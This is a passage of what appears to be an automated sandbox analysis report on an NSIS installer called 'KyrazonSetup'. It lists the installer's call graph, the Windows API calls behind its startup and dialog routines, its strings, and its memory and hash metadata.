3167->3171 3270 4037ce 3168->3270 3175 403662 GetCurrentProcess OpenProcessToken 3169->3175 3176 4036dc ExitProcess 3169->3176 3174 4056bc MessageBoxIndirectA 3170->3174 3171->3158 3171->3164 3178 4034a7 3173->3178 3180 40354a ExitProcess 3174->3180 3181 4036ad 3175->3181 3182 40367d LookupPrivilegeValueA AdjustTokenPrivileges 3175->3182 3177 403522 3177->3164 3185 403552 3178->3185 3186 4034ed 3178->3186 3183 406338 5 API calls 3181->3183 3182->3181 3184 4036b4 3183->3184 3187 4036c9 ExitWindowsEx 3184->3187 3190 4036d5 3184->3190 3343 405627 3185->3343 3327 405a26 3186->3327 3187->3176 3187->3190 3193 40140b 2 API calls 3190->3193 3193->3176 3194 403573 lstrcatA lstrcmpiA 3194->3164 3197 40358f 3194->3197 3195 403568 lstrcatA 3195->3194 3199 403594 3197->3199 3200 40359b 3197->3200 3198 403507 3342 405fa0 lstrcpynA 3198->3342 3346 40558d CreateDirectoryA 3199->3346 3351 40560a CreateDirectoryA 3200->3351 3205 4035a0 SetCurrentDirectoryA 3206 4035ba 3205->3206 3207 4035af 3205->3207 3355 405fa0 lstrcpynA 3206->3355 3354 405fa0 lstrcpynA 3207->3354 3210 405fc2 17 API calls 3211 4035f9 DeleteFileA 3210->3211 3212 403606 CopyFileA 3211->3212 3218 4035c8 3211->3218 3212->3218 3213 40364e 3215 405d7f 36 API calls 3213->3215 3216 403655 3215->3216 3216->3164 3217 405fc2 17 API calls 3217->3218 3218->3210 3218->3213 3218->3217 3220 40363a CloseHandle 3218->3220 3356 405d7f MoveFileExA 3218->3356 3360 40563f CreateProcessA 3218->3360 3220->3218 3222 4062ec wsprintfA LoadLibraryExA 3221->3222 3222->3136 3225 406354 3224->3225 3226 40635e GetProcAddress 3224->3226 3227 4062ca 3 API calls 3225->3227 3228 40327f 3226->3228 3229 40635a 3227->3229 3228->3140 3229->3226 3229->3228 3230->3146 3231->3148 3233 40620a 5 API calls 3232->3233 3235 4031e7 3233->3235 3234 4031f1 3234->3154 3235->3234 3363 405938 lstrlenA CharPrevA 3235->3363 3238 40560a 2 API calls 3239 4031ff 3238->3239 3240 405b68 2 API calls 3239->3240 3241 40320a 3240->3241 3241->3154 3366 405b39 GetFileAttributesA CreateFileA 3242->3366 3244 402da3 3245 402db3 3244->3245 3367 405fa0 lstrcpynA 3244->3367 3245->3162 3247 402dc9 3368 40597f lstrlenA 3247->3368 3251 402dda GetFileSize 3266 402ed6 3251->3266 3269 402df1 3251->3269 3253 402edf 3253->3245 3255 402f0f GlobalAlloc 3253->3255 3408 4031c4 SetFilePointer 3253->3408 3384 4031c4 SetFilePointer 3255->3384 3257 402f42 3261 402cff 6 API calls 3257->3261 3259 402ef8 3262 4031ae ReadFile 3259->3262 3260 402f2a 3385 402f9c 3260->3385 3261->3245 3264 402f03 3262->3264 3264->3245 3264->3255 3265 402cff 6 API calls 3265->3269 3373 402cff 3266->3373 3267 402f36 3267->3245 3267->3267 3268 402f73 SetFilePointer 3267->3268 3268->3245 3269->3245 3269->3257 3269->3265 3269->3266 3405 4031ae 3269->3405 3271 406338 5 API calls 3270->3271 3272 4037e2 3271->3272 3273 4037e8 3272->3273 3274 4037fa 3272->3274 3426 405efe wsprintfA 3273->3426 3275 405e87 3 API calls 3274->3275 3276 403825 3275->3276 3278 403843 lstrcatA 3276->3278 3280 405e87 3 API calls 3276->3280 3279 4037f8 3278->3279 3418 403a93 3279->3418 3280->3278 3283 405a26 18 API calls 3284 403875 3283->3284 3285 4038fe 3284->3285 3287 405e87 3 API calls 3284->3287 3286 405a26 18 API calls 3285->3286 3288 403904 3286->3288 3289 4038a1 3287->3289 3290 403914 LoadImageA 3288->3290 3291 405fc2 17 API calls 3288->3291 3289->3285 3294 4038bd lstrlenA 3289->3294 3297 405963 CharNextA 3289->3297 3292 4039ba 3290->3292 3293 40393b RegisterClassA 3290->3293 3291->3290 3296 40140b 2 API calls 3292->3296 3295 403971 SystemParametersInfoA CreateWindowExA 3293->3295 3325 4039c4 3293->3325 3298 4038f1 3294->3298 3299 4038cb lstrcmpiA 3294->3299 3295->3292 3300 4039c0 3296->3300 3301 4038bb 3297->3301 3303 405938 3 API calls 3298->3303 3299->3298 3302 4038db GetFileAttributesA 3299->3302 3305 403a93 18 API calls 3300->3305 3300->3325 3301->3294 3304 4038e7 3302->3304 3306 4038f7 3303->3306 3304->3298 3308 40597f 2 API calls 3304->3308 3309 4039d1 3305->3309 3427 405fa0 lstrcpynA 3306->3427 3308->3298 3310 403a60 3309->3310 3311 4039dd ShowWindow 3309->3311 3313 405199 5 API calls 3310->3313 3312 4062ca 3 API calls 3311->3312 3314 4039f5 3312->3314 3315 403a66 3313->3315 3316 403a03 GetClassInfoA 3314->3316 3319 4062ca 3 API calls 3314->3319 3317 403a82 3315->3317 3318 403a6a 3315->3318 3321 403a17 GetClassInfoA RegisterClassA 3316->3321 3322 403a2d DialogBoxParamA 3316->3322 3320 40140b 2 API calls 3317->3320 3323 40140b 2 API calls 3318->3323 3318->3325 3319->3316 3320->3325 3321->3322 3324 40140b 2 API calls 3322->3324 3323->3325 3324->3325 3325->3177 3326->3152 3429 405fa0 lstrcpynA 3327->3429 3329 405a37 3430 4059d1 CharNextA CharNextA 3329->3430 3332 4034f8 3332->3164 3341 405fa0 lstrcpynA 3332->3341 3333 40620a 5 API calls 3334 405a4d 3333->3334 3334->3332 3335 405a78 lstrlenA 3334->3335 3338 4062a3 2 API calls 3334->3338 3340 40597f 2 API calls 3334->3340 3335->3334 3336 405a83 3335->3336 3337 405938 3 API calls 3336->3337 3339 405a88 GetFileAttributesA 3337->3339 3338->3334 3339->3332 3340->3335 3341->3198 3342->3168 3344 406338 5 API calls 3343->3344 3345 403557 lstrcatA 3344->3345 3345->3194 3345->3195 3347 403599 3346->3347 3348 4055de GetLastError 3346->3348 3347->3205 3348->3347 3349 4055ed SetFileSecurityA 3348->3349 3349->3347 3350 405603 GetLastError 3349->3350 3350->3347 3352 40561a 3351->3352 3353 40561e GetLastError 3351->3353 3352->3205 3353->3352 3354->3206 3355->3218 3357 405da0 3356->3357 3358 405d93 3356->3358 3357->3218 3436 405c0f 3358->3436 3361 405672 CloseHandle 3360->3361 3362 40567e 3360->3362 3361->3362 3362->3218 3364 405952 lstrcatA 3363->3364 3365 4031f9 3363->3365 3364->3365 3365->3238 3366->3244 3367->3247 3369 40598c 3368->3369 3370 405991 CharPrevA 3369->3370 3371 402dcf 3369->3371 3370->3369 3370->3371 3372 405fa0 lstrcpynA 3371->3372 3372->3251 3374 402d20 3373->3374 3375 402d08 3373->3375 3376 402d30 GetTickCount 3374->3376 3377 402d28 3374->3377 3378 402d11 DestroyWindow 3375->3378 3379 402d18 3375->3379 3381 402d61 3376->3381 3382 402d3e CreateDialogParamA ShowWindow 3376->3382 3409 406374 3377->3409 3378->3379 3379->3253 3381->3253 3382->3381 3384->3260 3387 402fb2 3385->3387 3386 402fe0 3389 4031ae ReadFile 3386->3389 3387->3386 3415 4031c4 SetFilePointer 3387->3415 3390 402feb 3389->3390 3391 403147 3390->3391 3392 402ffd GetTickCount 3390->3392 3394 403131 3390->3394 3393 403189 3391->3393 3398 40314b 3391->3398 3392->3394 3401 40304c 3392->3401 3396 4031ae ReadFile 3393->3396 3394->3267 3395 4031ae ReadFile 3395->3401 3396->3394 3397 4031ae ReadFile 3397->3398 3398->3394 3398->3397 3399 405be0 WriteFile 3398->3399 3399->3398 3400 4030a2 GetTickCount 3400->3401 3401->3394 3401->3395 3401->3400 3402 4030c7 MulDiv wsprintfA 3401->3402 3413 405be0 WriteFile 3401->3413 3403 4050c7 24 API calls 3402->3403 3403->3401 3416 405bb1 ReadFile 3405->3416 3408->3259 3410 406391 PeekMessageA 3409->3410 3411 402d2e 3410->3411 3412 406387 DispatchMessageA 3410->3412 3411->3253 3412->3410 3414 405bfe 3413->3414 3414->3401 3415->3386 3417 4031c1 3416->3417 3417->3269 3419 403aa7 3418->3419 3428 405efe wsprintfA 3419->3428 3421 403b18 3422 403b4c 18 API calls 3421->3422 3424 403b1d 3422->3424 3423 403853 3423->3283 3424->3423 3425 405fc2 17 API calls 3424->3425 3425->3424 3426->3279 3427->3285 3428->3421 3429->3329 3431 4059ec 3430->3431 3435 4059fc 3430->3435 3433 4059f7 CharNextA 3431->3433 3431->3435 3432 405a1c 3432->3332 3432->3333 3433->3432 3434 405963 CharNextA 3434->3435 3435->3432 3435->3434 3437 405c35 3436->3437 3438 405c5b GetShortPathNameA 3436->3438 3463 405b39 GetFileAttributesA CreateFileA 3437->3463 3439 405c70 3438->3439 3440 405d7a 3438->3440 3439->3440 3442 405c78 wsprintfA 3439->3442 3440->3357 3445 405fc2 17 API calls 3442->3445 3443 405c3f CloseHandle GetShortPathNameA 3443->3440 3444 405c53 3443->3444 3444->3438 3444->3440 3446 405ca0 3445->3446 3464 405b39 GetFileAttributesA CreateFileA 3446->3464 3448 405cad 3448->3440 3449 405cbc GetFileSize GlobalAlloc 3448->3449 3450 405d73 CloseHandle 3449->3450 3451 405cde 3449->3451 3450->3440 3452 405bb1 ReadFile 3451->3452 3453 405ce6 3452->3453 3453->3450 3465 405a9e lstrlenA 3453->3465 3456 405d11 3458 405a9e 4 API calls 3456->3458 3457 405cfd lstrcpyA 3459 405d1f 3457->3459 3458->3459 3460 405d56 SetFilePointer 3459->3460 3461 405be0 WriteFile 3460->3461 3462 405d6c GlobalFree 3461->3462 3462->3450 3463->3443 3464->3448 3466 405adf lstrlenA 3465->3466 3467 405ab8 lstrcmpiA 3466->3467 3468 405ae7 3466->3468 3467->3468 3469 405ad6 CharNextA 3467->3469 3468->3456 3468->3457 3469->3466 4068 40378c 4069 403797 4068->4069 4070 40379b 4069->4070 4071 40379e GlobalAlloc 4069->4071 4071->4070 4072 401490 4073 4050c7 24 API calls 4072->4073 4074 401497 4073->4074 4075 401d9b GetDC 4076 402aa9 17 API calls 4075->4076 4077 401dad GetDeviceCaps MulDiv ReleaseDC 4076->4077 4078 402aa9 17 API calls 4077->4078 4079 401dde 4078->4079 4080 405fc2 17 API calls 4079->4080 4081 401e1b CreateFontIndirectA 4080->4081 4082 40257d 4081->4082 4083 40149d 4084 4014ab PostQuitMessage 4083->4084 4085 4022e7 4083->4085 4084->4085 4086 40159d 4087 402acb 17 API calls 4086->4087 4088 4015a4 SetFileAttributesA 4087->4088 4089 4015b6 4088->4089 4090 401a1e 4091 402acb 17 API calls 4090->4091 4092 401a27 ExpandEnvironmentStringsA 4091->4092 4093 401a3b 4092->4093 4094 401a4e 4092->4094 4093->4094 4095 401a40 lstrcmpA 4093->4095 4095->4094 4101 40171f 4102 402acb 17 API calls 4101->4102 4103 401726 SearchPathA 4102->4103 4104 401741 4103->4104 4105 401d20 4106 402aa9 17 API calls 4105->4106 4107 401d2e SetWindowLongA 4106->4107 4108 402957 4107->4108 4109 404822 4110 404832 4109->4110 4111 40484e 4109->4111 4120 4056a0 GetDlgItemTextA 4110->4120 4113 404881 4111->4113 4114 404854 SHGetPathFromIDListA 4111->4114 4116 40486b SendMessageA 4114->4116 4117 404864 4114->4117 4115 40483f SendMessageA 4115->4111 4116->4113 4118 40140b 2 API calls 4117->4118 4118->4116 4120->4115 4121 4041aa 4122 4041c0 4121->4122 4127 4042cc 4121->4127 4125 40403f 18 API calls 4122->4125 4123 40433b 4124 404405 4123->4124 4126 404345 GetDlgItem 4123->4126 4133 4040a6 8 API calls 4124->4133 4128 404216 4125->4128 4129 4043c3 4126->4129 4130 40435b 4126->4130 4127->4123 4127->4124 4131 404310 GetDlgItem SendMessageA 4127->4131 4132 40403f 18 API calls 4128->4132 4129->4124 4134 4043d5 4129->4134 4130->4129 4138 404381 SendMessageA LoadCursorA SetCursor 4130->4138 4154 404061 KiUserCallbackDispatcher 4131->4154 4136 404223 CheckDlgButton 4132->4136 4137 404400 4133->4137 4140 4043db SendMessageA 4134->4140 4141 4043ec 4134->4141 4152 404061 KiUserCallbackDispatcher 4136->4152 4155 40444e 4138->4155 4140->4141 4141->4137 4145 4043f2 SendMessageA 4141->4145 4142 404336 4146 40442a SendMessageA 4142->4146 4145->4137 4146->4123 4147 404241 GetDlgItem 4153 404074 SendMessageA 4147->4153 4149 404257 SendMessageA 4150 404275 GetSysColor 4149->4150 4151 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4149->4151 4150->4151 4151->4137 4152->4147 4153->4149 4154->4142 4158 405682 ShellExecuteExA 4155->4158 4157 4043b4 LoadCursorA SetCursor 4157->4129 4158->4157 3123 401e2b 3124 402aa9 17 API calls 3123->3124 3125 401e31 3124->3125 3126 402aa9 17 API calls 3125->3126 3127 401e3d 3126->3127 3128 401e54 EnableWindow 3127->3128 3129 401e49 ShowWindow 3127->3129 3130 402957 3128->3130 3129->3130 4159 4063ad WaitForSingleObject 4160 4063c7 4159->4160 4161 4063d9 GetExitCodeProcess 4160->4161 4162 406374 2 API calls 4160->4162 4163 4063ce WaitForSingleObject 4162->4163 4163->4160 4164 401f31 4165 402acb 17 API calls 4164->4165 4166 401f38 4165->4166 4167 4062a3 2 API calls 4166->4167 4168 401f3e 4167->4168 4169 401f50 4168->4169 4171 405efe wsprintfA 4168->4171 4171->4169 3470 401932 3471 401934 3470->3471 3472 402acb 17 API calls 3471->3472 3473 401939 3472->3473 3476 405768 3473->3476 3477 405a26 18 API calls 3476->3477 3478 405788 3477->3478 3479 405790 DeleteFileA 3478->3479 3480 4057a7 3478->3480 3484 401942 3479->3484 3481 4058d5 3480->3481 3513 405fa0 lstrcpynA 3480->3513 3481->3484 3487 4062a3 2 API calls 3481->3487 3483 4057cd 3485 4057e0 3483->3485 3486 4057d3 lstrcatA 3483->3486 3489 40597f 2 API calls 3485->3489 3488 4057e6 3486->3488 3490 4058f9 3487->3490 3491 4057f4 lstrcatA 3488->3491 3492 4057ff lstrlenA FindFirstFileA 3488->3492 3489->3488 3490->3484 3493 405938 3 API calls 3490->3493 3491->3492 3492->3481 3511 405823 3492->3511 3494 405903 3493->3494 3496 405720 5 API calls 3494->3496 3495 405963 CharNextA 3495->3511 3497 40590f 3496->3497 3498 405913 3497->3498 3499 405929 3497->3499 3498->3484 3504 4050c7 24 API calls 3498->3504 3500 4050c7 24 API calls 3499->3500 3500->3484 3501 4058b4 FindNextFileA 3503 4058cc FindClose 3501->3503 3501->3511 3503->3481 3505 405920 3504->3505 3506 405d7f 36 API calls 3505->3506 3506->3484 3508 405768 60 API calls 3508->3511 3509 4050c7 24 API calls 3509->3501 3510 4050c7 24 API calls 3510->3511 3511->3495 3511->3501 3511->3508 3511->3509 3511->3510 3512 405d7f 36 API calls 3511->3512 3514 405fa0 lstrcpynA 3511->3514 3515 405720 3511->3515 3512->3511 3513->3483 3514->3511 3523 405b14 GetFileAttributesA 3515->3523 3518 405743 DeleteFileA 3521 405749 3518->3521 3519 40573b RemoveDirectoryA 3519->3521 3520 40574d 3520->3511 3521->3520 3522 405759 SetFileAttributesA 3521->3522 3522->3520 3524 40572c 3523->3524 3525 405b26 SetFileAttributesA 3523->3525 3524->3518 3524->3519 3524->3520 3525->3524 4172 402932 SendMessageA 4173 402957 4172->4173 4174 40294c InvalidateRect 4172->4174 4174->4173 4175 4014b7 4176 4014bd 4175->4176 4177 401389 2 API calls 4176->4177 4178 4014c5 4177->4178 4179 4026ba 4180 4026c0 4179->4180 4181 402957 4180->4181 4182 4026c8 FindClose 4180->4182 4182->4181 3620 4015bb 3621 402acb 17 API calls 3620->3621 3622 4015c2 3621->3622 3623 4059d1 4 API calls 3622->3623 3635 4015ca 3623->3635 3624 401624 3626 401652 3624->3626 3627 401629 3624->3627 3625 405963 CharNextA 3625->3635 3630 401423 24 API calls 3626->3630 3628 401423 24 API calls 3627->3628 3629 401630 3628->3629 3639 405fa0 lstrcpynA 3629->3639 3637 40164a 3630->3637 3632 40560a 2 API calls 3632->3635 3633 405627 5 API calls 3633->3635 3634 40163b SetCurrentDirectoryA 3634->3637 3635->3624 3635->3625 3635->3632 3635->3633 3636 40160c GetFileAttributesA 3635->3636 3638 40558d 4 API calls 3635->3638 3636->3635 3638->3635 3639->3634 4183 40503b 4184 40504b 4183->4184 4185 40505f 4183->4185 4186 405051 4184->4186 4195 4050a8 4184->4195 4187 405067 IsWindowVisible 4185->4187 4191 40507e 4185->4191 4189 40408b SendMessageA 4186->4189 4190 405074 4187->4190 4187->4195 4188 4050ad CallWindowProcA 4192 40505b 4188->4192 4189->4192 4193 404992 5 API calls 4190->4193 4191->4188 4194 404a12 4 API calls 4191->4194 4193->4191 4194->4195 4195->4188 4196 4016bb 4197 402acb 17 API calls 4196->4197 4198 4016c1 GetFullPathNameA 4197->4198 4201 4016d8 4198->4201 4205 4016f9 4198->4205 4199 402957 4200 40170d GetShortPathNameA 4200->4199 4202 4062a3 2 API calls 4201->4202 4201->4205 4203 4016e9 4202->4203 4203->4205 4206 405fa0 lstrcpynA 4203->4206 4205->4199 4205->4200 4206->4205 4207 40273c 4208 402acb 17 API calls 4207->4208 4210 40274a 4208->4210 4209 402760 4212 405b14 2 API calls 4209->4212 4210->4209 4211 402acb 17 API calls 4210->4211 4211->4209 4213 402766 4212->4213 4235 405b39 GetFileAttributesA CreateFileA 4213->4235 4215 402773 4216 40281c 4215->4216 4217 40277f GlobalAlloc 4215->4217 4220 402824 DeleteFileA 4216->4220 4221 402837 4216->4221 4218 402813 CloseHandle 4217->4218 4219 402798 4217->4219 4218->4216 4236 4031c4 SetFilePointer 4219->4236 4220->4221 4223 40279e 4224 4031ae ReadFile 4223->4224 4225 4027a7 GlobalAlloc 4224->4225 4226 4027f1 4225->4226 4227 4027b7 4225->4227 4228 405be0 WriteFile 4226->4228 4229 402f9c 31 API calls 4227->4229 4230 4027fd GlobalFree 4228->4230 4234 4027c4 4229->4234 4231 402f9c 31 API calls 4230->4231 4233 402810 4231->4233 4232 4027e8 GlobalFree 4232->4226 4233->4218 4234->4232 4235->4215 4236->4223 4237 401b3f 4238 402acb 17 API calls 4237->4238 4239 401b46 4238->4239 4240 402aa9 17 API calls 4239->4240 4241 401b4f wsprintfA 4240->4241 4242 402957 4241->4242

                                                                                      Executed Functions

                                                                                      Function 0040320C Relevance: 80.9, APIs: 33, Strings: 13, Instructions: 366stringcomfileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 7 403257 1->7 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 7->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 53 4033e8 37->53 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 61 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->61 58 403526-403536 ExitProcess OleUninitialize 44->58 59 403498-40349e 44->59 47->42 47->48 48->42 55 4033a0-4033a2 49->55 56 4033a4 49->56 50->37 52 4033f5-403401 call 405fa0 50->52 52->33 53->28 55->50 55->56 56->50 65 40365a-403660 58->65 66 40353c-40354c call 4056bc ExitProcess 58->66 63 4034a0-4034ab call 405963 59->63 64 403516-40351d call 4037ce 59->64 61->44 61->58 81 4034e1-4034eb 63->81 82 4034ad-4034d6 63->82 73 403522 64->73 71 403662-40367b GetCurrentProcess OpenProcessToken 65->71 72 4036dc-4036e4 65->72 78 4036ad-4036bb call 406338 71->78 79 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 71->79 75 4036e6 72->75 76 4036ea-4036ee ExitProcess 72->76 73->58 75->76 87 4036c9-4036d3 ExitWindowsEx 78->87 88 4036bd-4036c7 78->88 79->78 85 403552-403566 call 405627 lstrcatA 81->85 86 4034ed-4034fa call 405a26 81->86 84 4034d8-4034da 82->84 84->81 89 4034dc-4034df 84->89 98 403573-40358d lstrcatA lstrcmpiA 85->98 99 403568-40356e lstrcatA 85->99 86->58 95 4034fc-403512 call 405fa0 * 2 86->95 87->72 92 4036d5-4036d7 call 40140b 87->92 88->87 88->92 89->81 89->84 92->72 95->64 98->58 101 40358f-403592 98->101 99->98 103 403594-403599 call 40558d 101->103 104 40359b call 40560a 101->104 110 4035a0-4035ad SetCurrentDirectoryA 103->110 104->110 111 4035ba-4035e2 call 405fa0 110->111 112 4035af-4035b5 call 405fa0 110->112 116 4035e8-403604 call 405fc2 DeleteFileA 111->116 112->111 119 403645-40364c 116->119 120 403606-403616 CopyFileA 116->120 119->116 122 40364e-403655 call 405d7f 119->122 120->119 121 403618-403638 call 405d7f call 405fc2 call 40563f 120->121 121->119 131 40363a-403641 CloseHandle 121->131 122->58 131->119
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 00403231
                                                                                      • GetVersion.KERNEL32 ref: 00403237
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032AD
                                                                                      • SHGetFileInfoA.SHELL32(00434030,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                                                                                      • GetCommandLineA.KERNEL32(0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                                                                                      • CharNextA.USER32(00000000,0047B000,00000020,0047B000,00000000,?,00000006,00000008,0000000A), ref: 0040331A
                                                                                      • GetTempPathA.KERNELBASE(00002000,00485000,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                                                                                      • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000006,00000008,0000000A), ref: 00403428
                                                                                      • lstrcatA.KERNEL32(00485000,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                                                                                      • GetTempPathA.KERNEL32(00001FFC,00485000,00485000,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                                                                                      • lstrcatA.KERNEL32(00485000,Low,?,00000006,00000008,0000000A), ref: 00403450
                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000006,00000008,0000000A), ref: 00403461
                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000006,00000008,0000000A), ref: 00403469
                                                                                      • DeleteFileA.KERNELBASE(00483000,?,00000006,00000008,0000000A), ref: 0040347D
                                                                                        • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                        • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                        • Part of subcall function 004037CE: lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,0047D000,00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410), ref: 004038BE
                                                                                        • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                                                        • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038DC
                                                                                        • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0047D000), ref: 00403925
                                                                                        • Part of subcall function 004037CE: RegisterClassA.USER32(0044E3A0), ref: 00403962
                                                                                      • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 00403526
                                                                                        • Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                                                                                      • ExitProcess.KERNEL32 ref: 0040354C
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                                                                                      • ExitProcess.KERNEL32 ref: 004036EE
                                                                                        • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                      • String ID: "$.tmp$0 C$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                                      • API String ID: 562314493-718682211
                                                                                      • Opcode ID: 19d9ae6564521ff10ca6c44c5a733c1293471e642710be4a9d2b41dec4053a02
                                                                                      • Instruction ID: d5c24e8c69225464c2db3592b0ad4ce52127ac0cc508638c6bb98776a2d2aa45
                                                                                      • Opcode Fuzzy Hash: 19d9ae6564521ff10ca6c44c5a733c1293471e642710be4a9d2b41dec4053a02
                                                                                      • Instruction Fuzzy Hash: A3C1D870504741AAD7216F759E89B2F3EACAF46706F04443FF581B61E2CB7C8A058B6E
                                                                                      Function 00405205 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 132 405205-405221 133 4053b0-4053b6 132->133 134 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 132->134 135 4053e0-4053ec 133->135 136 4053b8-4053da GetDlgItem CreateThread FindCloseChangeNotification 133->136 152 4052f0-40530a SendMessageA * 2 134->152 153 40530c-40530f 134->153 139 40540e-405414 135->139 140 4053ee-4053f4 135->140 136->135 144 405416-40541c 139->144 145 405469-40546c 139->145 142 4053f6-405409 ShowWindow * 2 call 404074 140->142 143 40542f-405436 call 4040a6 140->143 142->139 156 40543b-40543f 143->156 149 405442-405452 ShowWindow 144->149 150 40541e-40542a call 404018 144->150 145->143 147 40546e-405474 145->147 147->143 154 405476-405489 SendMessageA 147->154 157 405462-405464 call 404018 149->157 158 405454-40545d call 4050c7 149->158 150->143 152->153 160 405311-40531d SendMessageA 153->160 161 40531f-405336 call 40403f 153->161 162 405586-405588 154->162 163 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 154->163 157->145 158->157 160->161 171 405338-40534c ShowWindow 161->171 172 40536c-40538d GetDlgItem SendMessageA 161->172 162->156 169 4054d0-4054e6 TrackPopupMenu 163->169 170 4054bd-4054cd GetWindowRect 163->170 169->162 173 4054ec-405506 169->173 170->169 174 40535b 171->174 175 40534e-405359 ShowWindow 171->175 172->162 176 405393-4053ab SendMessageA * 2 172->176 177 